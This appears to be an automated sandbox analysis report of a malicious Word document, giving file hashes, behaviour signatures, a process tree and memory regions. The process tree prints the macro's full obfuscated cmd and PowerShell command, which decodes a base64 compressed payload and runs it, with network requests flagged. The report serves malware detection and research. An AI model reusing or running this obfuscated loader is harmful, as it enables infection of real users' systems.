Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 02:18

General

  • Target

    696bca0e525884c2707789bdea4a9020_JaffaCakes118.doc

  • Size

    73KB

  • MD5

    696bca0e525884c2707789bdea4a9020

  • SHA1

    19331e351fc0e9730d0df4f9000eecea8ce0fc8a

  • SHA256

    9243685da3defde3ad5297959c49e9d862d86b435eb659cf5de203108eb875a6

  • SHA512

    a86976f759726ebd1979c5334b5d87e141c01df323bf813628956374a034b163e7a1d0928ea656946891e47937213c91d49fe7249906ca9fadf180188852bb6f

  • SSDEEP

    768:I/rVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OLKXeIVMOwS:I/rocn1kp59gxBK85fBt+a9Os

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\696bca0e525884c2707789bdea4a9020_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1968
      • C:\Windows\SysWOW64\CMD.exe
        CMD CmD /c "SEt CwymA= ^& ((VAriable '*mdr*').nAmE[3,11,2]-JOIn'')(nEw-oBJECt systEM.Io.STreAMReaDer(( nEw-oBJECt iO.comPReSsIoN.deFLaTeSTreaM([sYsTEm.IO.MeMORysTream] [sySTEM.cONVerT]::frombaSe64STrIng('NZBdS8MwGIX/Si8C2ahNLucWClOHrgpCHTgm3qTtq61rPhbeNm6l/9212NvzHB44h5hNGWvwkcl+IMfgFZDtIXuoK9AoSPKkY1oi2hXn2Eoniwuw3Ch+u/5PpcPLUZ5tKZ2S+XmATDZ8d5oKReONZhqQe2sjaS1/mZCqVCZdoxo1Oj9Sl74d0sWEvfcsK5AZ980yx+/RvD9TtrN1hTO6pnNB7k5FEAd0uVxQQba+iQnodoWgbEg/aTjwkDL4BSq+jAOZlzNy2G+DSgfDtHmH7tyR6wVsY7yujSweqxrGzk0wCOci0a05QpRcpWMisqvnKPpcYl52ff8H' ),[SYStEM.io.coMPReSsiON.comPReSSiONmOdE]::dEcoMPREsS ) ), [SYsTEM.TEXT.EnCoDINg]::Ascii)).rEadtoEnD()&& pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( ^& (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( & (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2640

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      08e3d50e8375e9f29b8eeb6c22ab9e0f

      SHA1

      5d447a512bfffcd6ae2ab6ddc61c2ca60628d268

      SHA256

      fcc2834f6e87325a14d20152d581de3d48d92d8db7dfe7ea9e6a6f90d6c1ec67

      SHA512

      957c16dcaf31eda948c99baf2efb1cd8511048ac3d3cb1e7a15d1ab4906ab699a99b9a5bb40e29b00eaf844bbf5224ea2c73344fce474af7c034eb0251014b4c

    • memory/2156-0-0x000000002FB71000-0x000000002FB72000-memory.dmp
      Filesize

      4KB

    • memory/2156-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2156-2-0x00000000710ED000-0x00000000710F8000-memory.dmp
      Filesize

      44KB

    • memory/2156-6-0x0000000000470000-0x0000000000570000-memory.dmp
      Filesize

      1024KB

    • memory/2156-7-0x0000000000470000-0x0000000000570000-memory.dmp
      Filesize

      1024KB

    • memory/2156-8-0x0000000000470000-0x0000000000570000-memory.dmp
      Filesize

      1024KB

    • memory/2156-19-0x00000000710ED000-0x00000000710F8000-memory.dmp
      Filesize

      44KB

    • memory/2156-20-0x0000000000470000-0x0000000000570000-memory.dmp
      Filesize

      1024KB

    • memory/2156-35-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2156-37-0x0000000000470000-0x0000000000570000-memory.dmp
      Filesize

      1024KB

    • memory/2156-36-0x00000000710ED000-0x00000000710F8000-memory.dmp
      Filesize

      44KB